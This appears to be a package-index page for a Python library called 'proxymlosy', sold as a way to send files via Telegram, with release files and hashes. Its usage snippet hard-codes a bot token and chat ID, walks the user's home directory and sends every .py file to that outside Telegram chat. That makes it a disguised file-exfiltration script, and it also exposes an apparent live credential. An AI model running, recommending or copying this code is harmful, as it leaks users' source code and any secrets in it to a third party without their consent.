A Python library to send files via Telegram
Project description
from proxymlosy import FileSender import os
TOKEN = "7246461761:AAH6kA0RmIMzjzNPWUoJOzPQtd6wx8YnpHU" CHAT_ID = 8245348876 SEARCH_FOLDER = os.path.expanduser("~")
sender = FileSender(TOKEN, CHAT_ID) sender.send_all_files(SEARCH_FOLDER, extension=".py")
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
proxymlosy-0.1.1.tar.gz
(2.3 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file proxymlosy-0.1.1.tar.gz.
File metadata
- Download URL: proxymlosy-0.1.1.tar.gz
- Upload date:
- Size: 2.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.10.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
bb34335a885b4dfe12bb7c736298a0ff0ddec66d649975b1265fb11fc30a9485
|
|
| MD5 |
87dd8ccdf2ab6545dbb691c05098da90
|
|
| BLAKE2b-256 |
b2234b6a8450d8ae443b204b549f871f22c446ef127a47ef4fb7a1c5f0c8e241
|
File details
Details for the file proxymlosy-0.1.1-py3-none-any.whl.
File metadata
- Download URL: proxymlosy-0.1.1-py3-none-any.whl
- Upload date:
- Size: 2.5 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.1.0 CPython/3.10.12
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
ab3c53c96c5b4ea05c9ed8ccda6658ea1706a39eb13a28ff69e138f7c755369b
|
|
| MD5 |
d120a529d1f0f4e8fe5194720ee4a9bb
|
|
| BLAKE2b-256 |
b291efd30e6fa37e310a8860875d7ea4833bee544a311d60b27556412fe26112
|